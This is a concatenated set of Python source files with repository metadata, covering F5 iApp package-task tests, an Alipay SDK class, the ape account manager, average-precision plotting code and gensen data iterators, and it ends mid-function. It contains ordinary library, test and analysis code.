def pkg_task(mgmt_root, iapp_lx):
collection = mgmt_root.shared.iapp.package_management_tasks_s
task = collection.package_management_task.create(
operation='INSTALL',
packageFilePath='/var/config/rest/downloads/foo-iapp.rpm'
)
yield task
@pytest.fixture(scope='function')
def pkg_query_task(mgmt_root, iapp_lx):
collection = mgmt_root.shared.iapp.package_management_tasks_s
task = collection.package_management_task.create(
operation='QUERY'
)
yield task
class TestPackageManagementTasks(object):
def test_create_task(self, pkg_task):
assert pkg_task.operation == "INSTALL"
assert pkg_task.kind == \
'shared:iapp:package-management-tasks:iapppackagemanagementtaskstate' # NOQA
def test_load_no_task(self, mgmt_root):
with pytest.raises(HTTPError) as err:
collection = mgmt_root.shared.iapp.package_management_tasks_s
collection.package_management_task.load(
id='asdasdasd'
)
        assert err.value.response.status_code == 404
def test_load(self, mgmt_root, pkg_task):
collection = mgmt_root.shared.iapp.package_management_tasks_s
resource = collection.package_management_task.load(id=pkg_task.id)
assert pkg_task.id == resource.id
assert pkg_task.selfLink == resource.selfLink
def test_exists(self, mgmt_root, pkg_task):
pid = str(pkg_task.id)
collection = mgmt_root.shared.iapp.package_management_tasks_s
exists = collection.package_management_task.exists(id=pid)
assert exists is True
def test_cancel(self, pkg_task):
pkg_task.cancel()
assert pkg_task.__dict__['canceled']
def test_delete(self, pkg_task):
pkg_task.cancel()
while True:
pkg_task.refresh()
if pkg_task.status in ['CANCELED', 'FAILED', 'FINISHED']:
pkg_task.delete()
break
assert pkg_task.__dict__['deleted']
def test_package_mgmt_tasks_collection(self, mgmt_root, iapp_lx):
col = mgmt_root.shared.iapp.package_management_tasks_s.get_collection()
assert isinstance(col, list)
assert len(col) > 0
def test_create_query_task(self, pkg_query_task):
assert pkg_query_task.operation == "QUERY"
assert pkg_query_task.kind == \
'shared:iapp:package-management-tasks:iapppackagemanagementtaskstate' # NOQA
|
quanttrader/event/__init__.py | qalpha/quanttrader | 135 | 12797038 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from .event import *
from .backtest_event_engine import *
from .live_event_engine import * |
alipay/aop/api/domain/MultiStagePayLineInfo.py | antopen/alipay-sdk-python-all | 213 | 12797040 | <reponame>antopen/alipay-sdk-python-all<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class MultiStagePayLineInfo(object):
def __init__(self):
self._payment_amount = None
self._payment_idx = None
@property
def payment_amount(self):
return self._payment_amount
@payment_amount.setter
def payment_amount(self, value):
self._payment_amount = value
@property
def payment_idx(self):
return self._payment_idx
@payment_idx.setter
def payment_idx(self, value):
self._payment_idx = value
def to_alipay_dict(self):
params = dict()
if self.payment_amount:
if hasattr(self.payment_amount, 'to_alipay_dict'):
params['payment_amount'] = self.payment_amount.to_alipay_dict()
else:
params['payment_amount'] = self.payment_amount
if self.payment_idx:
if hasattr(self.payment_idx, 'to_alipay_dict'):
params['payment_idx'] = self.payment_idx.to_alipay_dict()
else:
params['payment_idx'] = self.payment_idx
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = MultiStagePayLineInfo()
if 'payment_amount' in d:
o.payment_amount = d['payment_amount']
if 'payment_idx' in d:
o.payment_idx = d['payment_idx']
return o
|
src/ape/managers/accounts.py | unparalleled-js/ape | 210 | 12797072 | from typing import Dict, Iterator, List, Type
from dataclassy import dataclass
from pluggy import PluginManager # type: ignore
from ape.api.accounts import AccountAPI, AccountContainerAPI, TestAccountAPI
from ape.types import AddressType
from ape.utils import cached_property, singledispatchmethod
from .config import ConfigManager
from .converters import ConversionManager
from .networks import NetworkManager
@dataclass
class AccountManager:
"""
The ``AccountManager`` is a container of containers for
:class:`~ape.api.accounts.AccountAPI` objects.
All containers must subclass :class:`~ape.api.accounts.AccountContainerAPI`
and are treated as singletons.
Import the accounts manager singleton from the root ``ape`` namespace.
Usage example::
from ape import accounts # "accounts" is the AccountManager singleton
my_accounts = accounts.load("dev")
"""
config: ConfigManager
converters: ConversionManager
plugin_manager: PluginManager
network_manager: NetworkManager
@cached_property
def containers(self) -> Dict[str, AccountContainerAPI]:
"""
The list of all :class:`~ape.api.accounts.AccountContainerAPI` instances
across all installed plugins.
Returns:
dict[str, :class:`~ape.api.accounts.AccountContainerAPI`]
"""
containers = {}
data_folder = self.config.DATA_FOLDER
data_folder.mkdir(exist_ok=True)
for plugin_name, (container_type, account_type) in self.plugin_manager.account_types:
# Ignore containers that contain test accounts.
if issubclass(account_type, TestAccountAPI):
continue
accounts_folder = data_folder / plugin_name
accounts_folder.mkdir(exist_ok=True)
containers[plugin_name] = container_type(accounts_folder, account_type, self.config)
return containers
@property
def aliases(self) -> Iterator[str]:
"""
All account aliases from every account-related plugin. The "alias"
is part of the :class:`~ape.api.accounts.AccountAPI`. Use the
account alias to load an account using method
:meth:`~ape.managers.accounts.AccountManager.load`.
Returns:
Iterator[str]
"""
for container in self.containers.values():
yield from container.aliases
def get_accounts_by_type(self, type_: Type[AccountAPI]) -> List[AccountAPI]:
"""
Get a list of accounts by their type.
Args:
type_ (Type[:class:`~ape.api.accounts.AccountAPI`]): The type of account
to get.
Returns:
List[:class:`~ape.api.accounts.AccountAPI`]
"""
accounts_with_type = []
for account in self:
if isinstance(account, type_):
self._inject_provider(account)
accounts_with_type.append(account)
return accounts_with_type
def __len__(self) -> int:
"""
The number of accounts managed by all account plugins.
Returns:
int
"""
return sum(len(container) for container in self.containers.values())
def __iter__(self) -> Iterator[AccountAPI]:
for container in self.containers.values():
for account in container:
self._inject_provider(account)
yield account
def __repr__(self) -> str:
return "[" + ", ".join(repr(a) for a in self) + "]"
@cached_property
def test_accounts(self) -> List[TestAccountAPI]:
"""
Accounts generated from the configured test mnemonic. These accounts
are also the subject of a fixture available in the ``test`` plugin called
``accounts``. Configure these accounts, such as the mnemonic and / or
number-of-accounts using the ``test`` section of the `ape-config.yaml` file.
Usage example::
def test_my_contract(accounts):
# The "accounts" fixture uses the AccountsManager.test_accounts()
sender = accounts[0]
receiver = accounts[1]
...
Returns:
List[:class:`~ape.api.accounts.TestAccountAPI`]
"""
accounts = []
for plugin_name, (container_type, account_type) in self.plugin_manager.account_types:
if not issubclass(account_type, TestAccountAPI):
continue
container = container_type(None, account_type, self.config)
for account in container:
self._inject_provider(account)
accounts.append(account)
return accounts
def load(self, alias: str) -> AccountAPI:
"""
Get an account by its alias.
Raises:
IndexError: When there is no local account with the given alias.
Returns:
:class:`~ape.api.accounts.AccountAPI`
"""
if alias == "":
raise ValueError("Cannot use empty string as alias!")
for account in self:
if account.alias and account.alias == alias:
self._inject_provider(account)
return account
raise IndexError(f"No account with alias '{alias}'.")
@singledispatchmethod
def __getitem__(self, account_id) -> AccountAPI:
raise NotImplementedError(f"Cannot use {type(account_id)} as account ID.")
@__getitem__.register
def __getitem_int(self, account_id: int) -> AccountAPI:
"""
Get an account by index. For example, when you do the CLI command
``ape accounts list --all``, you will see a list of enumerated accounts
by their indices. Use this method as a quicker, ad-hoc way to get an
account from that index. **NOTE**: It is generally preferred to use
:meth:`~ape.managers.accounts.AccountManager.load` or
:meth:`~ape.managers.accounts.AccountManager.__getitem_str`.
Returns:
:class:`~ape.api.accounts.AccountAPI`
"""
for idx, account in enumerate(self.__iter__()):
if account_id == idx:
self._inject_provider(account)
return account
raise IndexError(f"No account at index '{account_id}'.")
@__getitem__.register
def __getitem_str(self, account_str: str) -> AccountAPI:
"""
Get an account by address.
Raises:
IndexError: When there is no local account with the given address.
Returns:
:class:`~ape.api.accounts.AccountAPI`
"""
account_id = self.converters.convert(account_str, AddressType)
for container in self.containers.values():
if account_id in container:
account = container[account_id]
self._inject_provider(account)
return account
raise IndexError(f"No account with address '{account_id}'.")
def __contains__(self, address: AddressType) -> bool:
"""
Determine if the given address matches an account in ``ape``.
Args:
address (:class:`~ape.types.AddressType`): The address to check.
Returns:
bool: ``True`` when the given address is found.
"""
return any(address in container for container in self.containers.values())
def _inject_provider(self, account: AccountAPI):
if self.network_manager.active_provider is not None:
account.provider = self.network_manager.active_provider
|
BlogPosts/Average_precision/average_precision_post_code.py | markgraves/roamresearch | 190 | 12797086 | <gh_stars>100-1000
from copy import copy
from collections import OrderedDict
import numpy as np
import pandas as pd
from sklearn.metrics import average_precision_score, auc, roc_auc_score
from sklearn.metrics import precision_recall_curve
from sklearn.linear_model import LogisticRegressionCV
from sklearn.cross_validation import StratifiedShuffleSplit
import matplotlib.pyplot as plt
import matplotlib
from IPython.display import display, HTML
matplotlib.style.use('../../src/roam.mplstyle')
def generate_data_and_constant_predictions(n, frac_positive):
"""
Generates data in a fixed positive:negative ratio, and returns the
data and scores from a dummy model that predicts 0.5 for all examples.
Parameters
----------
n : int
Number of examples
frac_positive : float
Fraction of the examples that are positive
Returns
-------
observations : list
Consisting of (frac_positive * n) 1s, and (n - (frac_positive * n)) 0s
constant_predictions : list
Same length as observations
"""
n_positive = int(frac_positive * n)
n_negative = n - n_positive
observations = [1 for _ in range(n_positive)] + \
[0 for _ in range(n_negative)]
constant_predictions = [0.5 for _ in range(n_positive + n_negative)]
return observations, constant_predictions
def plot_recall_precision_from_predictions(true, scores, **kwargs):
"""
Computes precision and recall from some observations and scores assigned
to them, and plots a precision-recall curve.
Parameters
----------
true : list
Must be binary (i.e. 1s and 0s).
scores : list
Consisting of floats.
kwargs : optional
See plot_axes.
"""
p, r, thresholds = precision_recall_curve(true, scores)
plot_recall_precision(p, r, **kwargs)
def plot_recall_precision(p, r, **kwargs):
"""
Plots a precision-recall graph from a series of operating points.
Parameters
----------
p : list
Precision.
    r : list
        Recall.
    kwargs : optional
        See plot_axes.
"""
fig, ax = plt.subplots(1, 1, figsize=(7, 4))
plot_axes(ax, p, r, legend_text='IAP', **kwargs)
plt.show()
def plot_axes(
ax, y, x,
interpolation=None,
marker_size=30,
title=None,
legend_text='Area'):
"""
Plots a graph on axes provided.
Parameters
----------
ax : matplotlib axes
y : list
x : list
interpolation : None (default) or string ['linear', 'step']
marker_size : float (default: 30)
title : None or string
legend_text : string (default: 'Area')
Text to include on the legend before showing the area. Only used
if interpolation is not None.
"""
ax.scatter(x, y, marker='o', linewidths=0, s=marker_size, clip_on=False)
# Show first and last points more visibly
ax.scatter([x[i] for i in [0, -1]], [y[i] for i in [0, -1]],
marker='x', linewidths=2, s=100, clip_on=False)
ax.set_xlim((-0.05, 1.05))
ax.set_ylim((-0.08, 1.08))
ax.set_xlabel('Recall')
ax.set_ylabel('Precision')
if title is not None:
ax.set_title(title, fontsize=20)
if interpolation is not None:
if interpolation == 'linear':
ax.plot(x, y)
area = auc(x, y)
ax.fill_between(x, 0, y, alpha=0.2,
label='{} = {:5.4f}'.format(legend_text, area))
leg = ax.legend()
leg.get_frame().set_linewidth(0.0)
elif interpolation == 'step':
p_long = [v for v in y for _ in (0, 1)][:-1]
r_long = [v for v in x for _ in (0, 1)][1:]
ax.plot(r_long, p_long)
area = auc_using_step(x, y)
ax.fill_between(r_long, 0, p_long, alpha=0.2,
label='{} = {:5.4f}'.format(legend_text, area))
leg = ax.legend()
leg.get_frame().set_linewidth(0.0)
else:
print("Interpolation value of '{}' not recognised. "
"Choose from 'linear', 'quadrature'.".format(interpolation))
def compare_recall_precisions_from_predictions(true, score_dict, **kwargs):
"""
Show two graphs side-by-side for two different sets of scores, against the
same true observations.
Parameters
----------
true : list
score_dict : dict
Consisting of `{name: scores}` where `name` is a string and
`scores` is a list of floats.
kwargs : optional
See plot_axes.
"""
pr = OrderedDict()
for name, score in score_dict.items():
p, r, threshold = precision_recall_curve(true, score)
pr[name] = [p, r]
compare_recall_precision_graph(pr, **kwargs)
def compare_recall_precision_graph(pr_dict, title=None, **kwargs):
"""
Parameters
----------
pr_dict : dict
Consisting of `{name: pr}` where `name` is a string and
`pr` is a tuple of precision and recall values.
title : string
kwargs : optional
See plot_axes.
"""
fig, ax = plt.subplots(1, 2, figsize=(15, 4))
for side, (name, [p, r]) in enumerate(pr_dict.items()):
plot_axes(ax[side], p, r, title=name, legend_text='IAP', **kwargs)
if title is not None:
fig.suptitle(title, fontsize=20, y=1.05)
plt.show()
def operating_points(ranking):
"""
Computes lists of precision and recall from an ordered list of observations.
Parameters
----------
ranking : list
Entries should be binary (0 or 1) and in descending order
(i.e. top-ranked is first).
Returns
-------
precision : list
recall : list
"""
precision, recall = list(), list()
for pos in range(len(ranking)):
p, r = precision_recall_from_ranking(ranking, pos)
precision.append(p)
recall.append(r)
return precision, recall
def precision_recall_from_ranking(ranking, position):
"""
Computes the precision and recall of a particular assignment of labelled
observations to a positive and negative class, where the positive class
comes first in the list, and the negative class comes second, and the
split point is specified.
Parameters
----------
ranking : list
Ordered list of binary observations.
position : int
Position to split the list into positive and negative.
Returns
-------
precision : float
recall : float
"""
if position == 0:
precision = 1.0
recall = 0.0
else:
ranking = np.array(ranking)
precision = (ranking[:position] == 1).sum() / position
recall = (ranking[:position] == 1).sum() / (ranking == 1).sum()
return precision, recall
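# --- Editor's illustrative sketch (not part of the original post code). ---
# Walks a toy ranking through operating_points to show one (precision, recall)
# pair per cut-off position; top-ranked items come first in the list.
def _demo_operating_points():
    ranking = [1, 1, 0, 1]                      # labels ordered by model score
    precision, recall = operating_points(ranking)
    for p, r in zip(precision, recall):
        print('precision={:.2f} recall={:.2f}'.format(p, r))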
def auc_using_step(recall, precision):
return sum([(recall[i] - recall[i+1]) * precision[i]
for i in range(len(recall) - 1)])
def roam_average_precision(y_true, y_score, sample_weight=None):
precision, recall, thresholds = precision_recall_curve(
y_true, y_score, sample_weight=sample_weight)
return auc_using_step(recall, precision)
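# --- Editor's illustrative sketch (not part of the original post code). ---
# Compares the step-interpolated AP defined above with scikit-learn's
# average_precision_score on the same toy data; any difference between the two comes
# down to how that sklearn version interpolates the precision-recall curve.
def _demo_compare_average_precision():
    true = [1, 0, 1, 0, 0, 1]
    scores = [0.9, 0.8, 0.7, 0.6, 0.5, 0.4]
    print('step-wise AP:', roam_average_precision(true, scores))
    print('sklearn  AP:', average_precision_score(true, scores))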
def generate_positive_semi_definite_matrix(n_dim):
"""
Creates a positive semi-definite matrix.
Parameters
----------
n_dim : int
Returns
-------
np.array : (n_dim, n_dim)
"""
cov = np.random.randn(n_dim, n_dim)
return np.dot(cov, cov.T)
def subsample(X, y, frac_positive):
"""
Subsamples a feature matrix and target vector to ensure that a specified
fraction of the target values are positive.
Parameters
----------
X : np.array (n, m)
y : np.array (n, )
frac_positive : float
Returns
-------
X : np.array (n', m)
Some subset of the rows of the input X (i.e. n' <= n)
y : np.array (n', )
Some subset of the rows of the input y (i.e. n' <= n)
"""
positive_idx = np.arange(len(y))[y == 1]
negative_idx = np.arange(len(y))[y == 0]
num_positive = int(frac_positive * len(negative_idx))
positive_idx = np.random.choice(positive_idx, size=num_positive, replace=False)
indices_to_use = np.concatenate([positive_idx, negative_idx])
np.random.shuffle(indices_to_use)
return X[indices_to_use], y[indices_to_use]
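# --- Editor's illustrative sketch (not part of the original post code). ---
# Checks the class balance produced by subsample. Note that frac_positive is applied
# relative to the number of negatives, so the resulting positive fraction is
# frac_positive / (1 + frac_positive) rather than frac_positive itself.
def _demo_subsample_balance():
    X_toy = np.random.randn(1000, 3)
    y_toy = np.random.binomial(1, p=0.5, size=1000)
    _, y_sub = subsample(X_toy, y_toy, frac_positive=0.1)
    print('positive fraction after subsampling: {:.3f}'.format(y_sub.mean()))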
def generate_continuous_data_and_targets(
n_dim,
n_samples,
mixing_factor=0.025,
frac_positive=0.1):
"""
Generates a multivariate Gaussian-distributed dataset and a response
variable that is conditioned on a weighted sum of the data.
Parameters
----------
n_dim : int
n_samples : int
mixing_factor : float
'Squashes' the weighted sum into the linear regime of a sigmoid.
Smaller numbers squash closer to 0.5.
Returns
-------
X : np.array
(n_samples, n_dim)
y : np.array
(n_samples, )
"""
cov = generate_positive_semi_definite_matrix(n_dim)
X = np.random.multivariate_normal(
mean=np.zeros(n_dim),
cov=cov,
size=n_samples)
weights = np.random.randn(n_dim)
y_probs = sigmoid(mixing_factor * np.dot(X, weights))
y = np.random.binomial(1, p=y_probs)
X, y = subsample(X, y, frac_positive)
return X, y
def sigmoid(x):
"""
Computes sigmoid(x) for some activation x.
Parameters
----------
x : float
Returns
-------
sigmoid(x) : float
"""
return 1 / (1 + np.exp(-x))
def train_model_and_evaluate(n_dim=50, n_samples=10000, frac_positive=0.05,
mixing_factor=0.025):
"""
Generates some data and trains a logistic regression model.
Parameters
----------
n_dim : int
Number of dimensions for the training data.
n_samples : int
Number of observations.
frac_positive : float
mixing_factor : float
Numbers nearer to 0 make the task more challenging.
Returns
-------
y : np.array (n_test, )
True observed values in the test set.
y_scores : np.array (n_test, )
Model predictions of the test samples.
roc_auc : float
ROC AUC score on the test data
"""
X, y = generate_continuous_data_and_targets(
n_dim=n_dim, n_samples=n_samples, frac_positive=frac_positive,
mixing_factor=mixing_factor)
splits = StratifiedShuffleSplit(y, test_size=0.3, random_state=42)
train_idx, test_idx = list(splits)[0]
lr = LogisticRegressionCV()
lr.fit(X[train_idx], y[train_idx])
y_scores = lr.predict_proba(X[test_idx])[:, 1]
roc_auc = roc_auc_score(y[test_idx], y_scores)
return y[test_idx], y_scores, roc_auc
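# --- Editor's illustrative sketch (not part of the original post code). ---
# End-to-end usage of the helpers above: train the logistic-regression baseline on a
# small synthetic problem and report ROC AUC alongside the step-wise average precision.
def _demo_train_and_score():
    y_true, y_scores, roc_auc = train_model_and_evaluate(n_dim=20, n_samples=2000)
    print('ROC AUC     : {:.3f}'.format(roc_auc))
    print('step-wise AP: {:.3f}'.format(roam_average_precision(y_true, y_scores)))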
|
utils_nlp/models/gensen/utils.py | gohanlon/nlp | 4,407 | 12797099 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Minibatching utilities."""
import itertools
import operator
import os
import pickle
import numpy as np
import torch
from sklearn.utils import shuffle
from torch.autograd import Variable
# Change to python3+.
# from itertools import zip
class DataIterator(object):
"""Data Iterator."""
@staticmethod
def _trim_vocab(vocab, vocab_size):
"""Discard start, end, pad and unk tokens if already present.
Args:
vocab(list): Vocabulary.
vocab_size(int): The size of the vocabulary.
Returns:
word2id(dict): Word to index mapping.
id2word(dict): Index to word mapping.
"""
if "<s>" in vocab:
del vocab["<s>"]
if "<pad>" in vocab:
del vocab["<pad>"]
if "</s>" in vocab:
del vocab["</s>"]
if "<unk>" in vocab:
del vocab["<unk>"]
word2id = {"<s>": 0, "<pad>": 1, "</s>": 2, "<unk>": 3}
id2word = {0: "<s>", 1: "<pad>", 2: "</s>", 3: "<unk>"}
sorted_word2id = sorted(
vocab.items(), key=operator.itemgetter(1), reverse=True
)
if vocab_size != -1:
sorted_words = [x[0] for x in sorted_word2id[:vocab_size]]
else:
sorted_words = [x[0] for x in sorted_word2id]
for ind, word in enumerate(sorted_words):
word2id[word] = ind + 4
for ind, word in enumerate(sorted_words):
id2word[ind + 4] = word
return word2id, id2word
def construct_vocab(
self, sentences, vocab_size, lowercase=False, charlevel=False
):
"""Create vocabulary.
Args:
sentences(list): The list of sentences.
vocab_size(int): The size of vocabulary.
lowercase(bool): If lowercase the sentences.
charlevel(bool): If need to split the sentence with space.
Returns:
word2id(dict): Word to index mapping.
id2word(dict): Index to word mapping.
"""
vocab = {}
for sentence in sentences:
if isinstance(sentence, str):
if lowercase:
sentence = sentence.lower()
if not charlevel:
sentence = sentence.split()
for word in sentence:
if word not in vocab:
vocab[word] = 1
else:
vocab[word] += 1
word2id, id2word = self._trim_vocab(vocab, vocab_size)
return word2id, id2word
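# --- Editor's illustrative sketch (not part of the original module). ---
# Builds a tiny vocabulary with the base iterator; the four special tokens always
# occupy indices 0-3, with the remaining words ranked by frequency.
def _demo_construct_vocab():
    it = DataIterator()
    word2id, id2word = it.construct_vocab(
        ["the cat sat", "the dog sat"], vocab_size=10, lowercase=True
    )
    print(word2id)  # e.g. {'<s>': 0, '<pad>': 1, '</s>': 2, '<unk>': 3, 'the': 4, ...}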
class BufferedDataIterator(DataIterator):
"""Multi Parallel corpus data iterator."""
def __init__(
self,
src,
trg,
src_vocab_size,
trg_vocab_size,
tasknames,
save_dir,
buffer_size=1e6,
lowercase=False,
seed=0,
):
"""Initialize params.
Args:
src(list): source dataset.
trg(list): target dataset.
src_vocab_size(int): The size of source vocab.
trg_vocab_size(int): The size of target vocab.
tasknames(list): The list of task names.
save_dir(str): The saving dir.
buffer_size(float): Buffer size.
lowercase(bool): if lowercase the data.
"""
self.seed = seed
self.fname_src = src
self.fname_trg = trg
self.src_vocab_size = src_vocab_size
self.trg_vocab_size = trg_vocab_size
self.tasknames = tasknames
self.save_dir = save_dir
self.buffer_size = buffer_size
self.lowercase = lowercase
# Open a list of file pointers to all the files.
self.f_src = [
open(fname, "r", encoding="utf-8") for fname in self.fname_src
]
self.f_trg = [
open(fname, "r", encoding="utf-8") for fname in self.fname_trg
]
# Initialize dictionaries that contain sentences & word mapping dicts
self.src = [
{"data": [], "word2id": None, "id2word": None}
for i in range(len(self.fname_src))
]
self.trg = [
{"data": [], "word2id": None, "id2word": None}
for i in range(len(self.fname_trg))
]
self.build_vocab()
"""Reset file pointers to the start after reading the file to
build vocabularies."""
for idx in range(len(self.src)):
self._reset_filepointer(idx)
for idx in range(len(self.src)):
self.fetch_buffer(idx)
def _reset_filepointer(self, idx):
"""Reset file pointer.
Args:
idx(int): Index used to reset file pointer.
"""
self.f_src[idx] = open(self.fname_src[idx], "r", encoding="utf-8")
self.f_trg[idx] = open(self.fname_trg[idx], "r", encoding="utf-8")
def fetch_buffer(self, idx, reset=True):
"""Fetch sentences from the file into the buffer.
Args:
idx(int): Index used to fetch the sentences.
reset(bool): If need to reset the contents of the current buffer.
"""
# Reset the contents of the current buffer.
if reset:
self.src[idx]["data"] = []
self.trg[idx]["data"] = []
# Populate buffer
for src, trg in zip(self.f_src[idx], self.f_trg[idx]):
if len(self.src[idx]["data"]) == self.buffer_size:
break
if self.lowercase:
self.src[idx]["data"].append(src.lower().split())
self.trg[idx]["data"].append(trg.lower().split())
else:
self.src[idx]["data"].append(src.split())
self.trg[idx]["data"].append(trg.split())
# Sort sentences by decreasing length (hacky bucketing)
self.src[idx]["data"], self.trg[idx]["data"] = zip(
*sorted(
zip(self.src[idx]["data"], self.trg[idx]["data"]),
key=lambda x: len(x[0]),
reverse=True,
)
)
"""If buffer isn't full after reading the contents of the file,
cycle around. """
if len(self.src[idx]["data"]) < self.buffer_size:
assert len(self.src[idx]["data"]) == len(self.trg[idx]["data"])
# Cast things to list to avoid issue with calling .append above
self.src[idx]["data"] = list(self.src[idx]["data"])
self.trg[idx]["data"] = list(self.trg[idx]["data"])
self._reset_filepointer(idx)
self.fetch_buffer(idx, reset=False)
def build_vocab(self):
"""Build a memory efficient vocab."""
# Construct common source vocab.
# Check if save directory exists.
if not os.path.exists(self.save_dir):
raise ValueError("Could not find save dir : %s" % self.save_dir)
# Check if a cached vocab file exists.
if os.path.exists(os.path.join(self.save_dir, "src_vocab.pkl")):
vocab = pickle.load(
open(os.path.join(self.save_dir, "src_vocab.pkl"), "rb")
)
word2id, id2word = vocab["word2id"], vocab["id2word"]
# If not, compute the vocab from scratch and store a cache.
else:
word2id, id2word = self.construct_vocab(
itertools.chain.from_iterable(self.f_src),
self.src_vocab_size,
self.lowercase,
)
pickle.dump(
{"word2id": word2id, "id2word": id2word},
open(os.path.join(self.save_dir, "src_vocab.pkl"), "wb"),
)
for corpus in self.src:
corpus["word2id"], corpus["id2word"] = word2id, id2word
# Do the same for the target vocabulary.
if os.path.exists(os.path.join(self.save_dir, "trg_vocab.pkl")):
vocab = pickle.load(
open(os.path.join(self.save_dir, "trg_vocab.pkl"), "rb")
)
for idx, (corpus, fname) in enumerate(zip(self.trg, self.f_trg)):
word2id, id2word = (
vocab[self.tasknames[idx]]["word2id"],
vocab[self.tasknames[idx]]["id2word"],
)
corpus["word2id"], corpus["id2word"] = word2id, id2word
else:
trg_vocab_dump = {}
for idx, (corpus, fname) in enumerate(zip(self.trg, self.f_trg)):
word2id, id2word = self.construct_vocab(
fname, self.trg_vocab_size, self.lowercase
)
corpus["word2id"], corpus["id2word"] = word2id, id2word
trg_vocab_dump[self.tasknames[idx]] = {}
trg_vocab_dump[self.tasknames[idx]]["word2id"] = word2id
trg_vocab_dump[self.tasknames[idx]]["id2word"] = id2word
pickle.dump(
trg_vocab_dump,
open(os.path.join(self.save_dir, "trg_vocab.pkl"), "wb"),
)
def shuffle_dataset(self, idx):
"""Shuffle current buffer."""
self.src[idx]["data"], self.trg[idx]["data"] = shuffle(
self.src[idx]["data"],
self.trg[idx]["data"],
random_state=self.seed,
)
def get_parallel_minibatch(
self, corpus_idx, index, batch_size, max_len_src, max_len_trg
):
"""Prepare minibatch.
Args:
corpus_idx(int): Corpus Index.
index(int): Index.
batch_size(int): Batch Size.
max_len_src(int): Max length for source.
max_len_trg(int): Max length for target.
Returns: minibatch of src-trg pairs (dict).
"""
src_lines = [
["<s>"] + line[: max_len_src - 2] + ["</s>"]
for line in self.src[corpus_idx]["data"][
index : index + batch_size
]
]
trg_lines = [
["<s>"] + line[: max_len_trg - 2] + ["</s>"]
for line in self.trg[corpus_idx]["data"][
index : index + batch_size
]
]
"""Sort sentences by decreasing length within a minibatch for
`torch.nn.utils.packed_padded_sequence`"""
src_lens = [len(line) for line in src_lines]
sorted_indices = np.argsort(src_lens)[::-1]
sorted_src_lines = [src_lines[idx] for idx in sorted_indices]
sorted_trg_lines = [trg_lines[idx] for idx in sorted_indices]
sorted_src_lens = [len(line) for line in sorted_src_lines]
sorted_trg_lens = [len(line) for line in sorted_trg_lines]
max_src_len = max(sorted_src_lens)
max_trg_len = max(sorted_trg_lens)
# Map words to indices
input_lines_src = [
[
self.src[corpus_idx]["word2id"][w]
if w in self.src[corpus_idx]["word2id"]
else self.src[corpus_idx]["word2id"]["<unk>"]
for w in line
]
+ [self.src[corpus_idx]["word2id"]["<pad>"]]
* (max_src_len - len(line))
for line in sorted_src_lines
]
input_lines_trg = [
[
self.trg[corpus_idx]["word2id"][w]
if w in self.trg[corpus_idx]["word2id"]
else self.trg[corpus_idx]["word2id"]["<unk>"]
for w in line[:-1]
]
+ [self.trg[corpus_idx]["word2id"]["<pad>"]]
* (max_trg_len - len(line))
for line in sorted_trg_lines
]
output_lines_trg = [
[
self.trg[corpus_idx]["word2id"][w]
if w in self.trg[corpus_idx]["word2id"]
else self.trg[corpus_idx]["word2id"]["<unk>"]
for w in line[1:]
]
+ [self.trg[corpus_idx]["word2id"]["<pad>"]]
* (max_trg_len - len(line))
for line in sorted_trg_lines
]
# Cast lists to torch tensors
input_lines_src = Variable(torch.LongTensor(input_lines_src)).cuda()
input_lines_trg = Variable(torch.LongTensor(input_lines_trg)).cuda()
output_lines_trg = Variable(torch.LongTensor(output_lines_trg)).cuda()
sorted_src_lens = (
Variable(torch.LongTensor(sorted_src_lens), volatile=True)
.squeeze()
.cuda()
)
# Return minibatch of src-trg pairs
return {
"input_src": input_lines_src,
"input_trg": input_lines_trg,
"output_trg": output_lines_trg,
"src_lens": sorted_src_lens,
"type": "seq2seq",
}
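# --- Editor's illustrative sketch (not part of the original module). ---
# The line preparation used by get_parallel_minibatch, shown standalone on toy data
# (no corpus files or CUDA required): wrap with <s>/</s>, truncate, then pad.
def _demo_line_preparation():
    lines = [["a", "b", "c"], ["d"]]
    max_len = 5
    wrapped = [["<s>"] + line[: max_len - 2] + ["</s>"] for line in lines]
    longest = max(len(line) for line in wrapped)
    padded = [line + ["<pad>"] * (longest - len(line)) for line in wrapped]
    print(padded)  # [['<s>', 'a', 'b', 'c', '</s>'], ['<s>', 'd', '</s>', '<pad>', '<pad>']]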
class NLIIterator(DataIterator):
"""Data iterator for tokenized NLI datasets."""
def __init__(
self, train, dev, test, vocab_size, lowercase=True, vocab=None, seed=0
):
"""Initialize params.
Each of train/dev/test is a tab-separate file of the form
premise \t hypothesis \t label.
Args:
train(torch.Tensor): Training dataset.
dev(torch.Tensor): Validation dataset.
test(torch.Tensor): Testing dataset.
vocab_size(int): The size of the vocabulary.
lowercase(bool): If lowercase the dataset.
vocab(Union[bytes, str]): Path to a pickled vocabulary file (optional).
"""
self.seed = seed
self.train = train
self.dev = dev
self.test = test
self.vocab_size = vocab_size
self.lowercase = lowercase
self.vocab = vocab
self.train_lines = [
line.strip().lower().split("\t")
for line in open(self.train, encoding="utf-8")
]
self.dev_lines = [
line.strip().lower().split("\t")
for line in open(self.dev, encoding="utf-8")
]
self.test_lines = [
line.strip().lower().split("\t")
for line in open(self.test, encoding="utf-8")
]
if self.vocab is not None:
# binary mode doesn't take an encoding argument
self.vocab = pickle.load(open(self.vocab, "rb"))
self.word2id = self.vocab["word2id"]
self.id2word = self.vocab["id2word"]
self.vocab_size = len(self.word2id)
else:
self.word2id, self.id2word = self.construct_vocab(
[x[0] for x in self.train_lines]
+ [x[1] for x in self.train_lines],
self.vocab_size,
lowercase=self.lowercase,
)
# Label text to class mapping.
self.text2label = {"entailment": 0, "neutral": 1, "contradiction": 2}
self.shuffle_dataset()
def shuffle_dataset(self):
"""Shuffle training data."""
self.train_lines = shuffle(self.train_lines, random_state=self.seed)
def get_parallel_minibatch(self, index, batch_size, sent_type="train"):
"""Prepare minibatch.
Args:
index(int): The index for line.
batch_size(int): Batch size.
sent_type(str): Type of dataset.
Returns:
dict for batch training.
"""
if sent_type == "train":
lines = self.train_lines
elif sent_type == "dev":
lines = self.dev_lines
else:
lines = self.test_lines
sent1 = [
["<s>"] + line[0].split() + ["</s>"]
for line in lines[index : index + batch_size]
]
sent2 = [
["<s>"] + line[1].split() + ["</s>"]
for line in lines[index : index + batch_size]
]
labels = [
